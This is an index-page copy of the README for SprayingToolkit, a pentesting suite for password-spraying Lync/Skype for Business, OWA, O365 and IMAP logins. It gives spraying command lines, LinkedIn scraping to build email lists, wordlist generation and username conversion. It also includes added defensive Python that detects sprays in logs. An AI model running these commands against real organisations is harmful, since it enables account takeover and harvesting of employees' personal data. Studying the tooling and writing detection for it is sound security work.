Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/byt3bl33d3r/SprayingToolkit

Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient

lync o365 owa password-spraying password-spraying-attacks pentesting python3 red-teams security security-tools skype-for-business

Last synced: 24 days ago

README

        

# Deprecation Notice

This project is no longer maintained. The following alternative projects are better and actively maintained:

- [TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)
- [CredMaster](https://github.com/knavesec/CredMaster)

# SprayingToolkit



## Description

A set of Python scripts/utilities that *tries* to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.

## Sponsors
- https://www.blackhillsinfosec.com/
- https://volkis.com.au
- https://qomplx.com/blog/cyber/
- https://ledgerops.com
- https://www.guidepointsecurity.com/
- https://lostrabbitlabs.com/

## Official Discord Channel

Come hang out on Discord!

[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/khRyjTg)

## Installation

Install the pre-requisites with `pip3` as follows:

```bash
sudo -H pip3 install -r requirements.txt
```

Or use a Python virtual environment if you don't want to install the packages globally.

## Tool Overview

### Atomizer

A blazing fast password sprayer for Lync/Skype for Business and OWA, built on asyncio and Python 3.7.

#### Usage
```
Usage:
    atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME>

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help                   show this screen
    -v, --version                show version
    -c, --csvfile CSVFILE        csv file containing usernames and passwords
    -i, --interval TIME          spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS        number of concurrent threads to use [default: 3]
    -d, --debug                  enable debug output
    -p, --targetPort PORT        target port of the IMAP server (IMAP only) [default: 993]
    --recon                      only collect info, don't password spray
    --gchat URL                  gchat webhook url for notification
    --slack URL                  slack webhook url for notification
    --user-row-name NAME         username row title in CSV file [default: Email Address]
    --pass-row-name NAME         password row title in CSV file [default: Password]
    --user-as-pass USERFILE      use the usernames in the specified file as the password (one per line)
```

#### Examples

```bash
./atomizer.py owa contoso.com 'Fall2018' emails.txt
```

```bash
./atomizer.py lync contoso.com 'Fall2018' emails.txt
```

```bash
./atomizer.py lync contoso.com --csvfile accounts.csv
```

```bash
./atomizer.py lync contoso.com --user-as-pass usernames.txt
```

```bash
./atomizer.py owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
```

```bash
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <URL>
```
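
#### Detecting this pattern (added example)

Interval spraying as described above tries each password once per user and then waits, so the authentication log shows failures that are broad (many accounts) but shallow (one or two attempts per account) and repeat at a fixed gap. The following is an added example for defenders, not part of SprayingToolkit; the log line format, thresholds and function names are assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def build_sample():
    """Constructed log: 'ISO-timestamp source-ip username result' (not a real product's format)."""
    lines, t0 = [], datetime(2024, 1, 8, 9, 0, 0)
    # Two rounds 45 minutes apart from one source, one failed attempt per user per round.
    for rnd in range(2):
        for i in range(12):
            ts = t0 + timedelta(minutes=45 * rnd, seconds=i)
            lines.append(f"{ts.isoformat()} 203.0.113.7 user{i:02d}@contoso.com FAIL")
    # Benign contrast: one user mistyping a password, then succeeding.
    for i in range(6):
        ts = t0 + timedelta(minutes=3, seconds=20 * i)
        lines.append(f"{ts.isoformat()} 198.51.100.4 alice@contoso.com FAIL")
    lines.append(f"{(t0 + timedelta(minutes=5)).isoformat()} 198.51.100.4 alice@contoso.com OK")
    return lines

def detect_spray(lines, window=timedelta(minutes=5), min_users=10, max_per_user=2):
    """Return {source: [window_start, ...]} for windows in which one source failed
    against many distinct users while trying each only a few times."""
    fails = defaultdict(list)
    for line in lines:
        ts, src, user, result = line.split()
        if result == "FAIL":
            fails[src].append((datetime.fromisoformat(ts), user.lower()))
    hits = defaultdict(list)
    for src, events in fails.items():
        events.sort()
        start = 0
        while start < len(events):
            w0, per_user, end = events[start][0], defaultdict(int), start
            while end < len(events) and events[end][0] - w0 <= window:
                per_user[events[end][1]] += 1
                end += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[src].append(w0)
            start = end  # tumbling windows anchored on the first event of each burst
    return dict(hits)

def round_gaps(window_starts):
    """Gaps between flagged windows; a constant gap suggests a scheduled interval."""
    return [b - a for a, b in zip(window_starts, window_starts[1:])]

if __name__ == "__main__":
    for src, starts in detect_spray(build_sample()).items():
        print(src, [s.isoformat() for s in starts], round_gaps(starts))
```

Grouping by source address alone misses sprays distributed across many addresses, so the same breadth-versus-depth test is worth running per target service as well.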

### Vaporizer

A port of [@OrOneEqualsOne](https://twitter.com/OrOneEqualsOne)'s [GatherContacts](https://github.com/clr2of8/GatherContacts) Burp extension to [mitmproxy](https://mitmproxy.org/) with some improvements.

Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern, and performs password sprays in real time.

(Built on top of Atomizer)

#### Examples

```bash
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target= --set password=password --set email_format='{f}.{last}'
```

`email_format` is optional and defaults to the `{first}.{last}` pattern.

The `domain` parameter is the domain used to generate emails from names; the `target` parameter is the domain or URL to password spray.

Install the mitmproxy cert, set the proxy in your browser, go to Google and/or Bing and search (make sure to include the `/in`):

`site:linkedin.com/in "Target Company Name"`

Emails will be dumped to `emails.txt` in the specified format, and passed to Atomizer for spraying.

### Aerosol

Scrapes all text from the target website and sends it to [AWS Comprehend](https://aws.amazon.com/comprehend/) for analysis to generate custom wordlists for password spraying.

**Still a work in progress**

#### Usage

```bash
mitmdump -s aerosol.py --set domain=domain.com
```

### Spindrift

Converts names to Active Directory usernames (e.g. `Alice Eve` => `CONTOSO\aeve`).

#### Usage

```
Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]
```

#### Examples

Reads names from STDIN; `--domain` specifies the domain manually:

```bash
cat names.txt | ./spindrift.py --domain CONTOSO
```

Reads names from `names.txt`; `--target` dynamically grabs the internal domain name from OWA (you can give it a domain or URL):

```bash
./spindrift.py names.txt --target contoso.com
```